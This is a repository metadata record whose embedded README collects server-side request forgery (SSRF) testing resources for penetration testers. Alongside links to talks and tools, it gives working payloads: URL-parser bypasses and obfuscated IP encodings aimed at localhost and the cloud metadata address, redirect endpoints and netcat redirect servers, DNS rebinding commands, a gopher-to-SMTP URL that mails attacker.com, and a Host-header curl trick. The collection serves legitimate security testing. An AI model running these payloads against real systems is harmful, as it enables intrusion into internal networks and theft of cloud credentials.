{"id":13389881,"url":"https://github.com/cujanovic/SSRF-Testing","last_synced_at":"2025-03-13T14:32:17.449Z","repository":{"id":41128736,"uuid":"85674218","full_name":"cujanovic/SSRF-Testing","owner":"cujanovic","description":"SSRF (Server Side Request Forgery) testing resources","archived":false,"fork":false,"pushed_at":"2024-10-12T12:43:21.000Z","size":7283,"stargazers_count":2343,"open_issues_count":0,"forks_count":480,"subscribers_count":73,"default_branch":"master","last_synced_at":"2024-11-03T03:32:21.968Z","etag":null,"topics":["pentest","pentest-tool","pentesting","server-side-request-forgery","ssrf"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/cujanovic.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null}},"created_at":"2017-03-21T07:57:51.000Z","updated_at":"2024-11-03T03:20:55.000Z","dependencies_parsed_at":"2023-01-21T18:00:32.715Z","dependency_job_id":null,"html_url":"https://github.com/cujanovic/SSRF-Testing","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/cujanovic%2FSSRF-Testing/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/cujanovic","download_url":"https://codeload.github.com/cujanovic/SSRF-Testin
g/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243422682,"owners_count":20288500,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["pentest","pentest-tool","pentesting","server-side-request-forgery","ssrf"],"created_at":"2024-07-30T13:01:37.404Z","updated_at":"2025-03-13T14:32:14.639Z","avatar_url":"https://github.com/cujanovic.png","language":"Python","funding_links":["https://www.buymeacoffee.com/cujanovic"],"categories":["Python","Python (1887)"],"sub_categories":[],"readme":"\u003ca href=\"https://www.buymeacoffee.com/cujanovic\" target=\"_blank\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png\" alt=\"Buy Me A Coffee\" style=\"height: 60px !important;width: 217px !important;\" \u003e\u003c/a\u003e\n\n\n[I'm grateful for the support received by Tuta](https://tuta.com/)\n\n\n# SSRF (Server Side Request Forgery) testing resources\n\n***\n\n### Quick URL based bypasses:\n`http://google.com:80+\u0026@127.88.23.245:22/#+@google.com:80/`\n\n`http://127.88.23.245:22/+\u0026@google.com:80#+@google.com:80/`\n\n`http://google.com:80+\u0026@google.com:80#+@127.88.23.245:22/`\n\n`http://127.88.23.245:22/?@google.com:80/`\n\n`http://127.88.23.245:22/#@www.google.com:80/`\n\n`http://google.com:80\\\\@127.88.23.245:22/`\n\n***\n\n### htaccess - redirect test for various cases\nStatus codes: 300, 301, 302, 303, 305, 307, 308\n\nFiletypes: jpg, json, csv, xml, pdf\n#### Live demo:\njpg 301 response without and with a valid response 
body:\n\n`https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg`\n\n`https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg`\n\n`https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg`\n\n`https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg`\n\n\njson 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json`\n\n`https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json`\n\n`https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json`\n\n`https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json`\n\n\ncsv 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv`\n\n`https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv`\n\n`https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv`\n\n`https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv`\n\n\nxml 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml`\n\n`https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml`\n\n`https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml`\n\n`https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml`\n\npdf 301 response without and with a valid response body:\n\n`https://ssrf.localdomain.pw/pdf-without-body/301-http-169.254.169.254:80-.p.pdf`\n\n`https://ssrf.localdomain.pw/pdf-without-body-md/301-http-.p.pdf`\n\n`https://ssrf.localdomain.pw/pdf-with-body/301-http-169.254.169.254:80-.p.pdf`\n\n`https://ssrf.localdomain.pw/pdf-with-body-md/301-http-.p.pdf`\n\n***\n\n### custom-30x - Custom 30x responses and Location header with PHP\n\n#### Live 
demo:\n\n`https://ssrf.localdomain.pw/custom-30x/?code=332\u0026url=http://169.254.169.254/\u0026content-type=YXBwbGljYXRpb24vanNvbg==\u0026body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==\u0026fakext=/j.json`\n\n***\n\n### custom-200 - Custom 200 response and Content-Location header with PHP\n\n#### Live demo:\n\n`https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/\u0026content-type=YXBwbGljYXRpb24vanNvbg==\u0026body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==\u0026fakext=/j.json`\n\n***\n\n### custom-201 - Custom 201 response and Location header with PHP\n\n#### Live demo:\n\n`https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/\u0026content-type=YXBwbGljYXRpb24vanNvbg==\u0026body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==\u0026fakext=/j.json`\n\n***\n\n### Minimal web server using netcat\n\n`while true ; do nc -l -p 80 -c 'echo -e \"HTTP/1.1 302 Found\\nContent-Type: application/json\\nLocation: http://169.254.169.254/\\n{\\\"a\\\":\\\"b\\\"}\"'; done`\n\n`export RTSPLOCATION=\"http://169.254.169.254/\"; while true ; do nc -l -p 554 -c 'echo -e \"RTSP/1.0 301 Moved\\nCSeq: 1\\nLocation: $RTSPLOCATION\"'; done`\n\n***\n\n### ip.py - Alternate IP encoding tool useful for SSRF Testing\n\npython ip.py IP PORT WhiteListedDomain EXPORT(optional)\n\npython ip.py 169.254.169.254 80 www.google.com\n\npython ip.py 169.254.169.254 80 www.google.com export\n\n***\n\n### DNS pinning\n\nnslookup ssrf-169.254.169.254.localdomain.pw\n\nnslookup ssrf-cloud.localdomain.pw\n\nhttp://xip.io/\n\nnslookup 169.254.169.254.xip.io\n\nnslookup 1ynrnhl.xip.io\n\nnslookup www.owasp.org.1ynrnhl.xip.io\n\nnslookup 127.127.127.127.xip.io\n\nhttps://nip.io/\n\nnslookup 169.254.169.254.nip.io\n\nnslookup app-169-254-169-254.nip.io\n\nnslookup owasp.org.169.254.169.254.nip.io\n\nnslookup customer2-app-169-254-169-254.nip.io\n\nnslookup 127.127.127.127.nip.io\n\n***\n\n### DNS pinning race condition\n\nnslookup ssrf-race-169.254.169.254.localdomain.pw\n\n***\n\n### DNS Rebinding\n\npip 
install twisted\n\npython3 dns.py WhitelistedIP InternalIP ServerIP Port Domain\n\npython3 dns.py 216.58.214.206 169.254.169.254 78.47.24.216 53 localdomains.pw\n\nhttp://webcache.googleusercontent.com/search?q=cache:http://www.611eternity.com/DNSRebinding%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/\n\nDNS Rebinding Exploitation Framework - https://github.com/mwrlabs/dref\n\n***\n\n### cloud-metadata.txt - Cloud Metadata Dictionary useful for SSRF Testing\n\n***\n\n### svg - SSRF with svg files\n\n***\n\n### ffmpeg - SSRF with ffmpeg\n\nhttps://hackerone.com/reports/237381\n\nhttps://hackerone.com/reports/243470\n\nhttps://github.com/neex/ffmpeg-avi-m3u-xbin\n\nhttps://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf\n\nhttps://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.g22371f2702_0_15\n\n***\n\n### iframe - SSRF with html iframe + URL bypass\n\n#### Live demo:\n\n`http://ssrf.localdomain.pw/iframe/?proto=http\u0026ip=127.0.0.1\u0026port=80\u0026url=/`\n\n***\n\n### Abusing Enclosed Alphanumerics\n\n`http://169。254。169。254/`\n\n`http://169｡254｡169｡254/`\n\n`http://⑯⑨。②⑤④。⑯⑨｡②⑤④/`\n\n`http://⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ:80/`\n\n`http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/`\n\n`http://②⑧⑤②⓪③⑨①⑥⑥:80/`\n\n`http://④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪:80/`\n\n`http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/`\n\n`http://⓪⓪②⑤①｡⓪⓪⓪③⑦⑥｡⓪⓪⓪⓪②⑤①｡⓪⓪⓪⓪⓪③⑦⑥:80/`\n\n`http://[::①⑥⑨｡②⑤④｡⑯⑨｡②⑤④]:80/`\n\n`http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/`\n\n`http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/`\n\n`http://⓪ⓧⓐ⑨｡⑯⑥⑧⑨⑥⑥②:80/`\n\n`http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/`\n\n`http://⓪⓪②⑤①｡⓪ⓧⓕⓔ｡④③⑤①⑧:80/`\n\n***\n\n### commonly-open-ports.txt - list of commonly open ports\n\n***\n\n### SSRF2SMTP\n\nhttps://ssrf.localdomain.pw/ssrf2smtp/?proto=gopher\u0026ip=0\u0026port=25\u0026domain=domain.com\u0026to=email@attacker.com\u0026code=301\n\n***\n\n### Schemes-List.xlsx - 800 known schemes + useful references\n\nhttps://github.com/irsdl/OutlookLeakTest/blob/master/Schemes-List.xlsx?raw=true\n\n***\n\n### Java/Python FTP Injections Allow for Firewall Bypass\n\nhttp://webcache.googleusercontent.com/search?q=cache:http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html\n\nhttps://github.com/ecbftw/poc/blob/master/java-python-ftp-injection/ftp-injection-server.py\n\nhttp://webcache.googleusercontent.com/search?q=cache:https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/\n\n***\n\n### SSRF + Gopher + Redis\n\nhttp://webcache.googleusercontent.com/search?q=cache:http://vinc.top/2016/11/24/%E3%80%90ssrf%E3%80%91ssrfgopher%E6%90%9E%E5%AE%9A%E5%86%85%E7%BD%91%E6%9C%AA%E6%8E%88%E6%9D%83redis/\n\nhttps://webcache.googleusercontent.com/search?q=cache:http://antirez.com/news/96\n\n***\n\n### Top 5 features that are often prone to SSRF vulnerabilities:\n\nhttps://webcache.googleusercontent.com/search?q=cache:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF\n\n***\n\n### Joshua Maddux - When TLS Hacks You\n\nhttps://www.youtube.com/watch?v=qGpAJxfADjo\n\nhttps://github.com/jmdx/TLS-poison\n\n***\n\n### AppSecEU15-Server_side_browsing_considered_harmful.pdf\nhttps://www.youtube.com/watch?v=8t5-A4ASTIU\n\n***\n\n### us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf\nhttps://www.youtube.com/watch?v=D1S-G8rJrEk\n\n***\n\n### A tiny and cute URL fuzzer\n\nhttps://github.com/orangetw/Tiny-URL-Fuzzer\n\n***\n\n### Bypassing Server-Side Request Forgery filters by abusing a bug in Ruby's native resolver\n\nhttps://edoverflow.com/2017/ruby-resolv-bug/\n\nhttps://hackerone.com/reports/287245\n\nhttps://hackerone.com/reports/215105\n\n0177.1 =\u003e 127.0.0.1\n\n0x7f.1 =\u003e 127.0.0.1\n\n127.1 =\u003e 127.0.0.1\n\n***\n\n### AWS bypass only\n\nhttp://instance-data/latest/meta-data/\n\n***\n\n### SSRF Tips\nhttp://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/\n\n***\n\n### PHP SSRF Techniques\nhttps://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51\n\n***\n\n### SSRF bible\nhttps://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM\n\n***\n\n### SSRF Proxy\nhttps://github.com/bcoles/ssrf_proxy\n\nSSRF Proxy facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery\n\n***\n\n### SSRF via Request Splitting\n\nhttps://www.rfk.id.au/blog/entry/security-bugs-ssrf-via-request-splitting/\n\n***\n\n### Overly Permissive Proxy\nhttps://www.nginx.com/blog/trust-no-one-perils-of-trusting-user-input/\n\ncurl http://remote-ip-address/latest/meta-data/ -H \"Host: 169.154.169.254\"\n\n***\n\n### All you need to know about SSRF and how may we write tools to do auto-detect\nhttps://medium.com/bugbountywriteup/the-design-and-implementation-of-ssrf-attack-framework-550e9fda16ea\n\n***\n\n### Gopherus - This tool generates gopher link for doing SSRF and RCE in various servers\nhttps://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/\n\n***\n\n### A Glossary of Blind SSRF Chains\nhttps://blog.assetnote.io/2021/01/13/blind-ssrf-chains/\n\n***\n\n\u003ca href=\"https://www.buymeacoffee.com/cujanovic\" target=\"_blank\"\u003e\u003cimg src=\"https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png\" alt=\"Buy Me A Coffee\" style=\"height: 60px !important;width: 217px !important;\" \u003e\u003c/a\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcujanovic%2FSSRF-Testing","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcujanovic%2FSSRF-Testing","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcujanovic%2FSSRF-Testing/lists"}